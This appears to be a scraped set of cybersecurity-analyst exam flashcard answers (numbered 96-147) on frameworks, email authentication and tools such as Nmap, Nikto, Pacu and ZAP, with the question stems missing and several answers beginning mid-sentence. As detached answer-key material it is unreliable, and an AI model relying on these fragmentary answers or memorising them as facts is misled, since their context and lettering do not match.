SDLC Phase stands for Software Development Life Cycle Phase. It refers to one of the stages or steps involved in the process of creating software applications. The SDLC typically consists of multiple phases, each with its own specific goals and activities.

Answer 96

A

A tabletop exercise is a simulated scenario that helps organizations test their emergency response plans and procedures. It’s a controlled environment where participants can practice responding to a hypothetical crisis or incident without the risks and consequences of a real-world event.

Answer 97

A

TTP in cybersecurity typically refers to Tactics, Techniques, and Procedures. It’s a framework used to categorize and analyze the methods employed by threat actors to compromise systems and networks

Answer 98

A

Obfuscated links are links that have been disguised or altered to make it difficult to determine their true destination. This can be done for various reasons, including:

To hide malicious intent: Attackers may obfuscate links to phishing websites or malware downloads to make them appear legitimate.
To track clicks: Marketers may obfuscate links to track click-through rates and analyze user behavior.
To protect sensitive information: Organizations may obfuscate links to sensitive data to prevent unauthorized access.

Answer 99

A

The Capability Maturity Model Integration (CMMI) is a process improvement framework that helps organizations improve their ability to deliver products and services. It provides a structured approach to process improvement, focusing on five levels of maturity:
Initial: The organization’s processes are chaotic and poorly defined.
Repeatable: Basic processes are established, but they may be inconsistent and inefficient.
Defined: Processes are standardized and documented, but may not be optimized.
Managed: Processes are quantitatively measured and controlled.
Optimized: Processes are continuously improved and optimized.

Answer 100

A

OWASP (Open Web Application Security Project) is a global nonprofit organization focused on improving the security of software applications. It provides frameworks, tools, and resources to help developers and security professionals build more secure web applications.

Some of OWASP’s key initiatives include:

OWASP Top 10: A list of the most critical web application security risks.
OWASP ZAP: A free and open-source web application security scanner.
OWASP Security Knowledge Base: A collection of articles, tutorials, and resources on web application security.
OWASP Testing Guide: A comprehensive guide to web application security testing.

Answer 101

A

SLA Cybersecurity: A Contractual Commitment to Security
SLA stands for Service Level Agreement

. In the context of cybersecurity, an SLA is a contract between a service provider (like a Managed Security Service Provider or MSSP) and a client that outlines the specific cybersecurity services to be provided and the expected level of performance.

Answer 102

A

Scope of Services: Clearly defined services, such as vulnerability assessments, penetration testing, incident response, or threat monitoring.

Performance Metrics: Specific measurements used to evaluate the service provider’s performance, such as response times to incidents, uptime guarantees, or compliance with industry standards.
Responsibilities: Clearly defined roles and responsibilities of both the service provider and the client.
Incident Response Plan: Procedures for handling security incidents, including notification processes, investigation steps, and remediation actions.
Termination Clauses: Conditions under which the agreement can be terminated.
Confidentiality and Data Privacy: Provisions to protect sensitive information.

Answer 103

A

Data Classification
Access Controls
Data Loss Prevention (DLP)
Threat Detection and Response
Compliance Requirements
Incident Response Plan
User Education and Awareness

Answer 104

A

MITRE ATT&CK is a comprehensive framework for analyzing and understanding the tactics, techniques, and procedures (TTPs) used by attackers in cyber attacks.

While the cyber kill chain provides a detailed view of the different stages of an attack, it does not provide as much detail about the tactics, techniques, and procedures used by the attacker as MITRE ATT&CK.

The SANS Institute Top 20 Critical Security Controls list the 20 most important security controls organizations should implement to protect against cyber attacks. It does not specialize in tactics, techniques, and procedures (TTPs).

While the National Institute of Standards and Technology (NIST) provides a comprehensive view of information security, it does not provide a framework for analyzing tactics, techniques, and procedures (TTPs).

Answer 105

A

is a versatile open-source platform designed for the analysis of malware behavior. It provides a controlled environment where suspicious files can be executed safely, allowing security analysts to observe and understand their actions.

Answer 106

A

D.DMARC combines two other email authentication protocols, SPF and DKIM. It allows the receiver to check that an email claimed to have come from a specific domain was indeed authorized by the owner of that domain. This can help verify the authenticity of the email.

While email header analysis can provide valuable information about the origin and path of an email, it may not definitively prove the legitimacy of the email.

While this technique can help identify malicious links or attachments in an email, it doesn’t confirm the legitimacy of the sender.

Verifying the reputation of the sender can be helpful but does not provide a foolproof method of determining the legitimacy of the email.

Answer 107

A

C.-Open Source Security Testing Methodology Manual (OSSTMM) is a comprehensive methodology for conducting a security assessment of a network infrastructure.

Answer 108

A

A and B.-In this scenario, the network administrator is using tcpdump to monitor network performance, and it can provide information that the network administrator can use in this scenario.

The administrator is also using tcpdump to capture and analyze network packets for troubleshooting purposes, such as diagnosing network issues or analyzing network behavior.

Answer 109

A

C.-DNS-based Authentication of Named Entities (DANE) provides a mechanism for verifying the authenticity of a server’s Transport Layer Security (TLS) certificate, although it does not protect against phishing attacks.

Answer 110

A

B.Domain-based Message Authentication, Reporting, and Conformance (DMARC)
Domain-based Message Authentication, Reporting & Conformance (DMARC) is a comprehensive solution for protecting against phishing attacks. It builds on Sender Policy Framework (SPF) and DomainKeys Identified Mail (DKIM) to provide a complete solution for preventing email spoofing.

Answer 111

A

D.-The Open Source Security Testing Methodology Manual (OSSTMM) covers various security aspects, such as physical, information, and wireless security, making it the most appropriate choice for the organization’s security assessment.

Answer 112

A

A.-Automating incident responses is one of the key benefits of using a security orchestration, automation, and response (SOAR) platform. The security analyst can respond to incidents more quickly and effectively by automating routine and repetitive tasks.

Answer 113

A

C.-A malware infection can cause activity on unexpected ports as the malware communicates with its command-and-control server, exfiltrates data, or carries out other malicious activities.

Answer 114

A

B.- Storing large data sets can consume a significant amount of disk capacity, particularly if the data is in multiple locations or if a user improperly manages and archives the data.

Answer 115

A

B.- Maltego is a tool specifically designed for information gathering and visualizing the relationships between various entities. It can gather information about domains, IP addresses, and other network entities to help identify potential targets for a cyber attack.

Answer 116

A

C.- Nessus is a vulnerability scanning tool that supports scanning various types of systems, devices, and applications. The team can use Nessus to provide detailed reports with actionable recommendations.

Burp Suite is a web application security testing tool that focuses on identifying vulnerabilities and security issues in web applications. It is not specifically used for comprehensive vulnerability assessments across the network infrastructure.

Splunk is a powerful data analytics and log management platform that helps organizations gain insights from their data and monitor their infrastructure. It is not specifically used for comprehensive vulnerability assessments.

Snort is an open-source intrusion detection and prevention system (IDPS) that monitors network traffic for malicious activities and potential security threats. It is not for comprehensive vulnerability assessments.

Answer 117

A

A.- Memory leaks occur when an application allocates memory but does not release it when it is no longer needed, causing high memory consumption over time. It is the most likely cause of high memory consumption.

Answer 118

A

Angry IP Scanner provides basic information about open ports and services but may not provide the same level of detail or accuracy as Nmap.

Answer 119

A

Nmap is a popular open-source tool for network discovery, mapping, and security auditing. Its features include the ability to scan a large number of hosts, detect operating systems and applications, and perform vulnerability assessments.

Answer 120

A

The OpenVAS tool is an open-source vulnerability scanner that can identify vulnerabilities in multiple operating systems and devices, making it a suitable option for the security analyst.

Answer 121

A

B.- A distributed denial-of-service (DDoS) attack is a type of cyber attack that uses multiple compromised devices to flood a target network with traffic, causing a denial of service. An unusual spike in network traffic could indicate a DDoS attack.

Answer 122

A

A.- Angry IP Scanner is a popular open-source network scanning and mapping tool. It can scan an entire network or a range of IP addresses to identify all connected devices and services.

Answer 123

A

A.- Metasploit is a widely used framework for penetration testing and exploiting vulnerabilities. It allows security professionals to test the security of a network by finding and exploiting vulnerabilities.

Answer 124

A

A.- By determining which ports are open using a port scan, the security analyst can determine what services or applications are running on the target device, and identify any unauthorized devices or services that may be present on the network.

Answer 125

A

is another popular web application scanner designed to use the command line, and the project website is https://www.cirt.net/nikto2. Nikto can discover the type of HTTP server and web applications running on a host and expose vulnerabilities contained within them. Nikto scans using default settings can be easily performed using the command nikto -h.

Answer 126

A

is another open-source web scanner application (arachni-scanner.com) available with both command line and web-based graphical interfaces. By default, the scanner audits HTML forms, JavaScript forms, JSON input, XML input, links, and any orphan input elements. The scanner actively tests many different vulnerabilities, including code injection, SQL injection, XSS, CSRF, local and remote file inclusion, session fixation, directory traversal, backdoors, insecure policies, server information leakage, personal data exposure, and others.

Answer 127

A

is an audit tool for use with AWS only. It can detect misconfigurations and security issues, such as weak passwords, unpatched systems, and insecure protocol use. It can also be used to evaluate cloud infrastructure against the CIS Benchmarks™ for AWS (cisecurity.org/benchmark/amazon_web_services) and perform regulatory compliance checks.

Answer 128

A

s a powerful open-source security auditing tool used to assess cloud infrastructure security. It allows organizations to evaluate the security of their cloud environments across multiple providers and services, such as Amazon Web Services (AWS), Microsoft Azure, and Google Cloud Platform (GCP). The tool collects data from a cloud platform using API calls. Then it compiles a report of all the discovered objects, including VM instances, storage containers, IAM accounts, data, firewall ACLs, and many others. The scanner ruleset can categorize discovered items with severity levels based on predetermined policies.

Answer 129

A

is designed as an exploitation framework for evaluating the security of an AWS environment. It includes modules for exploiting APIs and VM instances. An attacker or pen tester can use cloud-access credentials to determine how they may be abused to gather information about other accounts and configured services, or gain unauthorized access to cloud services.

Answer 130

A

C. Zed Attack Proxy (ZAP) is a free, open-source web application security testing tool. It identifies security vulnerabilities in web applications and supports creating and sharing custom scripts and plugins. ZAP is a popular choice for web application security assessments.

Answer 131

A

B.- Burp Suite is a web application security testing tool that provides comprehensive features for identifying and mitigating security vulnerabilities. It would be the most appropriate tool for the software development company to use in this scenario.

Answer 132

A

A.- Nikto is a web server scanner that the security analyst can use to specifically identify vulnerabilities in web servers. It can quickly scan multiple web servers and provide comprehensive information on any detected vulnerabilities.

Answer 133

A

A.- Pacu is an open-source Amazon Web Services (AWS) exploitation framework for penetration testing engagements in AWS environments. It automates various attack scenarios and helps validate the effectiveness of cloud security controls.

Answer 134

A

D.-Prowler is an open-source security tool that helps organizations evaluate their Amazon Web Services (AWS) infrastructure and ensure it adheres to industry best practices and compliance standards.

Answer 135

A

C.- ScoutSuite is an open-source multi-cloud security auditing tool that supports AWS, Azure, and GCP environments. It assesses the security posture of cloud environments and provides a concise view of potential security risks and misconfigurations.

Answer 136

A

D.- ZAP (Zed Attack Proxy) is a popular open-source web application testing tool. It has many features to support automated scanning, input manipulation, and API testing. Key features include an intercepting proxy for intercepting and modifying requests and responses between the browser and web application and an active scanner that can identify vulnerabilities such as SQL injection and cross-site scripting (XSS). Its plugin architecture can extend its capabilities, allowing users to create and share custom scripts and plugins.

Answer 137

A

B.- The GNU Debugger is a widely used debugging tool for Linux-based applications. It allows developers to examine and debug applications, inspect the runtime state, and modify the program’s execution flow.

Answer 138

A

B.- The analyst should prioritize analyzing newly created user accounts, as the increase in high-privilege actions may be in relation to the unauthorized introduction of new accounts with elevated permissions.

Answer 139

A

D.- Analyzing shell script logs would be the most effective way to investigate potential malicious activities related to this incident on the affected Linux-based system. The obfuscated script seems to be utilizing system-level commands, which is typical for shell scripts.

Answer 140

A

D.- PowerShell is a task-based command-line shell and scripting language designed specifically for Windows environments. It is for scripting and automating tasks within Windows, making it the best choice for this scenario.

Answer 141

A

B.- Regular expressions are a powerful tool for defining and searching for specific patterns in text data, making them the most appropriate choice for this scenario.

Answer 142

A

B.- Python has a vast and well-established ecosystem for machine learning, with numerous libraries and tools available for tasks such as data analysis, visualization, and modeling.

Answer 143

A

C.- Analyzing PowerShell logs would be the most effective way to identify potentially malicious activity since the discovered script includes cmdlets unique to a certain language, which the analyst can infer as PowerShell.

Answer 144

A

A.- OWASP Web Security Testing Guide is a comprehensive guide for web application security testing. It provides guidelines, best practices, and resources for web developers to ensure that their applications are secure from various types of attacks.

Answer 145

A

In cybersecurity, Data Loss Prevention (DLP) refers to a set of strategies, technologies, and practices designed to ensure that sensitive or critical information does not get lost, leaked, or accessed by unauthorized individuals. DLP solutions aim to protect data from both accidental and intentional breaches.

Answer 146

A

Data exfiltration

Answer 147

A

Decrypting data at rest.

Brainscape's Knowledge GenomeTM

Assessment 1 Flashcards

Brainscape's Knowledge Genome^TM